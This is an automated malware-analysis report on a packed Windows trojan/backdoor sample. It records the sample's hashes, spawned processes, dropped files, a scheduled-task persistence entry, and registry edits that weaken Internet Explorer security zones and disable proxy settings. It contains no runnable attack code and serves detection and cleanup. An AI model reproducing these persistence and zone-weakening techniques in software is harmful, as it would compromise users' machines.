Trojan.Generic.11523868_52feb8d0a4
Trojan.Win32.AntiFW.b (Kaspersky), Trojan.Generic.11523868 (AdAware), Backdoor.Win32.PcClient.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, Backdoor
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: 52feb8d0a4447f79e3f56fe4a8a588f5
SHA1: 534fadf5bbc1ade55879079ff68b788e7969d99c
SHA256: 02867c9ed8b668d3dad76d15e05e70c0076047c4cc269828e8edda2b3eda062e
SSDeep: 6144:dr3bUzkuvcBYC47l2xiFjox21H9mbWnqnHB/Jc9BItkszgx4ygD6:drckuveY3fFj4ThVkszC4y/
Size: 322648 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2013-03-12 10:51:45
Analyzed on: WindowsXPESX SP3 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
%original file name%.exe:1404
usetup.exe:220
SystemProlonger.exe:1612
SystemProlonger.exe:608
putfu.exe:1320
rundll32.exe:1676
rundll32.exe:512
The Trojan injects its code into the following process(es):
No processes have been created.
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process %original file name%.exe:1404 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\All Users\Application Data\InstallMate\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\Custom.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.1404.usetup.exe (25824 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\x86\regsvr32.exe (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{3DA40CAB-BD44-40AF-A244-F566E6472E5D} (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.1404.putfu.exe (198289 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TsuA22E3355.dll (2569 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\1_1[1].txt (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.1404.1_1.ini (6 bytes)
%Documents and Settings%\All Users\Application Data\InstallMate\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\Readme.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\_Setup.dll (6360 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\BDF51210.dat (16424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\Setup.ico (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\All Users\Application Data\InstallMate\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\TsuDll.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\Setup.exe (15 bytes)
%Documents and Settings%\All Users\Application Data\InstallMate\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\Setup.dat (16944 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\1[1].txt (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\Custom.dll (3312 bytes)
%Documents and Settings%\All Users\Application Data\InstallMate\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\Setup.ico (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_tin1E16.bat (88 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.1404.1.ini (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\DeltaFix[1].exe (198289 bytes)
%Documents and Settings%\All Users\Application Data\InstallMate\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\Setup.exe (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\52feb8d0a4447f79e3f56fe4a8a588f5.log (1657732 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\x64\regsvr32.exe (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\Readme.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\agup[1].exe (25824 bytes)
%Documents and Settings%\All Users\Application Data\InstallMate\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\_Setup.dll (673 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\x86 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\x86\regsvr32.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{3DA40CAB-BD44-40AF-A244-F566E6472E5D} (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TsuA22E3355.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\x64 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.1404.putfu.exe.part (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\Custom.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_tin1E16.bat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.1404.1.ini.part (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\x64\regsvr32.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\BDF51210.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\Setup.ico (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.1404.1_1.ini.part (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\Addons\putfu.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\Setup.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\Addons (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\Addons\usetup.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\r1.getapplicationmy[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.1404.usetup.exe.part (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\_Setup.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\r1.getapplicationmy[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\Readme.txt (0 bytes)
The process usetup.exe:220 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\All Users\Application Data\SnowApp\SystemProlonger\SystemProlonger.exe (26080 bytes)
The process SystemProlonger.exe:608 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Tasks\SystemProlonger-S-4177913480.job (696 bytes)
%Documents and Settings%\All Users\Application Data\SnowApp\SystemProlonger\4177913480.ini (36544 bytes)
The process putfu.exe:1320 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\DeltaFix\DeltaFix.dll (260858 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tf00294823.dll (28502 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\tf00294823.dll (0 bytes)
Registry activity
The process %original file name%.exe:1404 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\Addons]
"usetup.exe" = "usetup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"NetHood" = "%Documents and Settings%\%current user%\NetHood"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ecf8688d-6ba5-4c89-bc14-43df01af0cb9]
"TSAware" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ecf8688d-6ba5-4c89-bc14-43df01af0cb9]
"VersionMajor" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ecf8688d-6ba5-4c89-bc14-43df01af0cb9]
"UninstallString" = "C:\DOCUME~1\ALLUSE~1\APPLIC~1\INSTAL~1\{3DA40~1\Setup.exe /remove /q0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ecf8688d-6ba5-4c89-bc14-43df01af0cb9]
"Version" = "16777216"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\TsuA22E3355.dll,"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ecf8688d-6ba5-4c89-bc14-43df01af0cb9]
"Language" = "1033"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ecf8688d-6ba5-4c89-bc14-43df01af0cb9]
"EstimatedSize" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Administrative Tools" = "%Documents and Settings%\All Users\Start Menu\Programs\Administrative Tools"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Templates" = "%Documents and Settings%\%current user%\Templates"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ecf8688d-6ba5-4c89-bc14-43df01af0cb9]
"VersionMinor" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{5c14c4f6-74da-11e2-81b0-000c29ec7fc5}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Administrative Tools" = ""
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"SendTo" = "%Documents and Settings%\%current user%\SendTo"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ecf8688d-6ba5-4c89-bc14-43df01af0cb9]
"QuietUninstallString" = "C:\DOCUME~1\ALLUSE~1\APPLIC~1\INSTAL~1\{3DA40~1\Setup.exe /remove /q"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Fonts" = "%WinDir%\Fonts"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7D 8B F4 FD C6 DA CC FC B0 90 BD D3 86 BF D7 06"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ecf8688d-6ba5-4c89-bc14-43df01af0cb9]
"TizPath" = "c:\%original file name%.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Recent" = "%Documents and Settings%\%current user%\Recent"
"Favorites" = "%Documents and Settings%\%current user%\Favorites"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"
The Trojan modifies IE security zone settings so that all local web nodes with no dots in their names, which are not assigned to any zone, are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process usetup.exe:220 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A3 BE 55 72 B8 E6 3A 58 FB D6 E0 29 BC B5 97 4C"
The process SystemProlonger.exe:1612 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C8 2E 7A FE AD E7 61 34 74 AA 53 83 CA 92 C6 F8"
The process SystemProlonger.exe:608 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\SystemProlonger\4177913480\NP6yu5 tnZZH0OQIKE1/gD3hJMqT/]
"NP6yu5 mGooxrikg01VravP7V/5b68FyY" = "NP6yu5 xztvqomjlha"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\S-4177913480]
"_In" = "20141128"
[HKLM\SOFTWARE\SystemProlonger\4177913480\NP6yu5 tnZZH0OQIKE1/gD3hJMqT/]
"NP6yu5 xGCT2oqomjlV2gRnCoLMWn7nyn" = "NP6yu5 tQ3dtOHwysu7dAPo9rWzs6Cz73val5GwlYqnEmAXyKRiEzz 0sbZtS5"
"NP6yu5 mGMVNpnikg0UES4we2P15TB9y" = "NP6yu5 zbMgbIcdefAUN"
"NP6yu5 q2cpRx789/XueIe5iLgmR36Hi9ZR5HNZs2A" = "NP6yu5 p2g4ahLFHwykW"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\S-4177913480]
"SilentUninstall" = "c:\documents and settings\all users\application data\snowapp\systemprolonger\systemprolonger.exe /uninstall"
[HKLM\SOFTWARE\SystemProlonger\4177913480\NP6yu5 tnZZH0OQIKE1/gD3hJMqT/]
"NP6yu5 m493B1JLFHwfSLP0cq" = "NP6yu5 j4afWvjlhabCRFUrMY6XH7"
"NP6yu5 oxTCwROQIKEbfoQmXOVq3pyCV" = "NP6yu5 zbMgbIcdefAUN"
"NP6yu5 u4W7I3FHwysfpPWVEc640Vgj7vuI5FRvR" = "NP6yu5 xKYF 812345Z1"
"NP6yu5 kzHwZuJLFHw5Fr3FSOzPpISE/F" = "NP6yu5 z9ki dG xztBeHgzzfrUcCBzYJjzlM03XUyvN fi5DF3ThnHiJv9dhJEjG0fde TGYXfWCSmQmAaRVh9liAcdEU6o/DVyNOh1C3bd5VePdl7fd6xWFTIhT 2cN4 d bwFINsRX0R xCm/Xpt1 vkNUu0U/ejw9Z 46dsSE3L4fJ1LZD40Qra3EozAj/KUo9Yzq5MSHIkeML56cNmIV8vxOEaBEBpOKYMddrQK1SLOS0KUOlCLMmEIHlHFaPWGWv2wliG7ANo1NjY QkVTF7TouhiLUTZhHYx7TgiD9brWoNZCoA6v8DS1aqrGLFUplKMqKHTLmAkWVsyY4KRXNwvdLz/5ISt/0xWN7bcshtc12I19DXygEyZCy9PLCX7XbFMzN8rUTPL8e875 XJZFrIfSi7ylqA4yI7B4Njur9ztySKHd/kShR4CAnEi2skAkgjDCnwShsABq5MBXA0SuGj3fTGQfiFaQOK7azBgXe9MO2nx3mtGro3weKv1tS"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\S-4177913480]
"URLInfoAbout" = ""
[HKLM\SOFTWARE\SystemProlonger\4177913480\NP6yu5 tnZZH0OQIKE1/gD3hJMqT/]
"NP6yu5 mPpwLQDWYSUoj8v7lBa0 8W0MSmWN4ClWM7" = "NP6yu5 pWfzXomjlhaY3L25EhciMYYPGZkywPx"
"NP6yu5 ow1rR56789/ue1sByvUf4kVuix" = "NP6yu5 p2g4ahLFHwykW"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\S-4177913480]
"DisplayName" = "SystemProlonger"
[HKLM\SOFTWARE\SystemProlonger\4177913480\NP6yu5 tnZZH0OQIKE1/gD3hJMqT/]
"NP6yu5 iI0lv89/XZTpmaWCAW6XiF/xIowoplYxrEc" = "NP6yu5 u bj81JLFHw0F5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\S-4177913480]
"URLUpdateInfo" = ""
[HKLM\SOFTWARE\SystemProlonger\4177913480\NP6yu5 tnZZH0OQIKE1/gD3hJMqT/]
"NP6yu5 jJE/mnBCDWYvA42sczUv9SClfrqvZXt8sBARO" = "NP6yu5 zln05FHwysu04U7VKD91PAojv"
"NP6yu5 t5w/eBhabcdLg7/sFSAaTxRvG" = "NP6yu5 pWfzXomjlhaY3L25EhciMYYPGZkywPx"
"NP6yu5 oFUvMDbcdefHBbxrMluGJ9Aygj" = "NP6yu5 yZKZjefABCDz76N9UmHe0p0kgH5NGRfwxzCZGcCt9/G/oGfA6jw"
"NP6yu5 t3BD56789/Xu4TF4qCfDCBTHm9BO81oA/UPCl" = "NP6yu5 jnxjzOdefABNqu"
"NP6yu5 jnTHsfABCDWtWkUM/W1aPBtS1 VQW3XAfac" = "NP6yu5 xztvqomjlha"
"NP6yu5 t p YmhabcdJfHSAepXR5o1j1c DKl8GWf2QPTqLd" = "NP6yu5 yGPmcIjlhabC8jyU1lyiDHIeZFTFR"
"NP6yu5 sFynDebcdef tMD" = "NP6yu5 zbMgbIcdefAUN"
"NP6yu5 oRN6utIKEG digPng1ySOBlAVHvZrTks5X3JZ0jUs" = "NP6yu5 o4IdosRJLFHmfwN6K"
"NP6yu5 rK2YdOCDWYSo sSZJb0LFNMK7umzJ4f" = "NP6yu5 o4IdosRJLFHmfwN6K"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\S-4177913480]
"InstallDate" = "20131128"
"NoModify" = "1"
[HKLM\SOFTWARE\SystemProlonger\4177913480\NP6yu5 tnZZH0OQIKE1/gD3hJMqT/]
"NP6yu5 upBrs456789yYTFdDrzVA0PJHl5GUN4cRRU6I0 /b" = "NP6yu5 ms6Kogvqomje5FgkwM"
"NP6yu5 kMSXeBMOQIKhE69m1QE674UDEx" = "NP6yu5 u bj81JLFHw0F5"
"NP6yu5 qCEj2JrpnikTXYRb/hjk8pv2i7" = "NP6yu5 ire7AFHwysu7daGH/1I 8/fYQTHvbDbfbFpsZR9hg1ZLTwQJfCgwjG"
"NP6yu5 qAAIJrpnikgVSUoLaz3mK8u RgKbxPY" = "NP6yu5 ms6Kogvqomje5FgkwM"
"NP6yu5 sH9 Y xztvq/XYWHIi jTIOMPd" = "NP6yu5 nWYONZWYSUMmKdWHSyBsxoIXlq8L0acxfPYSvuyukjdQWYOTbm8kHsQ"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\S-4177913480]
"NoRepair" = "1"
"DisplayVersion" = "4.0.0.1919"
[HKLM\SOFTWARE\SystemProlonger\4177913480\NP6yu5 tnZZH0OQIKE1/gD3hJMqT/]
"NP6yu5 uGnmtBCDWYSqb6jM/jZxaHmJs4bb/qRin 8" = "NP6yu5 uMM73jlhabcD2bm7fLUxHpHEXaGsTnu9xqsZV"
"NP6yu5 u2C5SlhabcdKYXGD2X5Dtp " = "NP6yu5 ph19whLFHwykp2y61l2FaT4r0bFW2swZ5vDQiK"
"NP6yu5 o/JAuurpnikZzc72iod641QVSkWTqJSu5zR" = "NP6yu5 rk50XvKEG xeKLvesJcI/uDaKRkMWR2hnutqmBtZdkaLX2fgHL"
"NP6yu5 jO7cksRJLFHdItgO4" = "NP6yu5 ookVA701234YHM8"
"NP6yu5 rOHR67habcdI6oQitBZylEDlKv" = "NP6yu5 ookVA701234YHM8"
"NP6yu5 q83XdcabcdeK18vAC0H9NVFErZY89qziqz" = "NP6yu5 pWfzXomjlhaY3L25EhciMYYPGZkywPx"
"NP6yu5 tJp3sbqomjlSvJfgkDPgofAaSAq8LeS0XEI" = "NP6yu5 v/8ZHGfABCDQWexMA"
"NP6yu5 s2TbxEefABCxJ0DAXr /fsJdEdZsSHr HV" = "NP6yu5 yJSqVjbcdefTNR8h0D9emAILDaou1CDRdu71j"
"NP6yu5 iqFGhLqomjlSrvHfNHJ3oZIgyJwy44WgZ8t" = "NP6yu5 z9ki dG xztBeHgzzfrUcCBzYJjzlM03XUyvN fi5DF3ThnHiJv9dhJEjG0fde TGYXfWCSmQmAaRVh9liAcdEU6o/DVyNOh1C3bd5VePdl7fd6xWFTIhT 2cN4 d bwFINsRX0R xCm/Xpt1 vkNUu0U/ejw9Z 46dsSE3L4fJ1LZD40Qra3EozAj/KUo9Yzq5MSHIkeML56cNmIV8vxOEaBEBpOKYMddrQK1SLOS0KUOlCLMmEIHlHFaPWGWv2wliG7ANo1NjY QkVTF7TouhiLUTZhHYx7TgiD9brWoNZCoA6v8DS1aqrGLFUplKMqKHTLmAkWVsyY4KRXNwvdLz/5ISt/0xWN7bcshtc12I19DXygEyZCy9PLCX7XbFMzN8rUTPL8e875 XJZFrIfSi7ylqA4yI7B4Njur9ztySKHd/kShR4CAnEi2skAkgjDCnwShsABq5MBXA0SuGj3fTGQfiFaQOK7azBgXe9MO2nx3mtGro3weKv1tS"
"NP6yu5 yEFhrM xztvBTqybYrHCKZLQDEDd77yDa71" = "NP6yu5 nWYONZWYSUMmKdWHSyBsxoIXlq8L0acxfPYSvuyukjdQWYOTbm8kHsQ"
"NP6yu5 xegqyZTVNPRhap40RL5nzk9RVF fIgeuX" = "NP6yu5 ouLGsR/XZTVHZg6"
"NP6yu5 jxu9x/ztvqoWwAvzzG1eDHhjPa" = "NP6yu5 pWfzXomjlhaY3L25EhciMYYPGZkywPx"
"NP6yu5 qwDMhUjlhabRi95gdx9wB Kt8h" = "NP6yu5 rk50XvKEG xeKLvesJcI/uDaKRkMWR2hnutqmBtZdkaLX2fgHL"
"NP6yu5 vGPjjAfABCDtsHMzvqSfT7E4si" = "NP6yu5 v/8ZHGfABCDQWexMA"
"NP6yu5 r 8G2h34567HEDrcOMl 7 u93c" = "NP6yu5 uMM73jlhabcD2bm7fLUxHpHEXaGsTnu9xqsZV"
"NP6yu5 jyYwQburpniZRRB5FiXXl0Nh4RV" = "NP6yu5 zln05FHwysu04U7VKD91PAojv"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\S-4177913480]
"Publisher" = "SystemProlonger"
[HKLM\SOFTWARE\SystemProlonger\4177913480\NP6yu5 tnZZH0OQIKE1/gD3hJMqT/]
"NP6yu5 vbNHYCDWYSUoiK7bPU/LiTlOXXB/Y/8ZsgUeDPvDrC" = "NP6yu5 ouLGsR/XZTVHZg6"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B7 41 0D 2A C4 20 56 D1 C4 1D 13 DE 55 7F CE 27"
[HKLM\SOFTWARE\SystemProlonger\4177913480\NP6yu5 tnZZH0OQIKE1/gD3hJMqT/]
"NP6yu5 qmagWavqomjYke3rg3RaIWgtRR6ly542b" = "NP6yu5 ph19whLFHwykp2y61l2FaT4r0bFW2swZ5vDQiK"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\S-4177913480]
"DisplayIcon" = "C:\Windows\System32\msiexec.exe"
[HKLM\SOFTWARE\SystemProlonger\4177913480\NP6yu5 tnZZH0OQIKE1/gD3hJMqT/]
"NP6yu5 qnt FxztvqoDfBtS/GCPHJVoOIo2SDnPtKi" = "NP6yu5 yZKZjefABCDz76N9UmHe0p0kgH5NGRfwxzCZGcCt9/G/oGfA6jw"
"NP6yu5 obHhU6789/Xu3lMQKQBU9v0o8l1 pwHGQ7a" = "NP6yu5 ire7AFHwysu7daGH/1I 8/fYQTHvbDbfbFpsZR9hg1ZLTwQJfCgwjG"
"NP6yu5 t4SMY89/XZTo241UBcL1FgCdQgO" = "NP6yu5 jnxjzOdefABNqu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\S-4177913480]
"CategoryName" = "Apps"
"UninstallString" = "c:\documents and settings\all users\application data\snowapp\systemprolonger\systemprolonger.exe /uninstall"
[HKLM\SOFTWARE\SystemProlonger\4177913480\NP6yu5 tnZZH0OQIKE1/gD3hJMqT/]
"NP6yu5 pNrKTFbcdefEjL8Z1TlnENCpBpb" = "NP6yu5 j4afWvjlhabCRFUrMY6XH7"
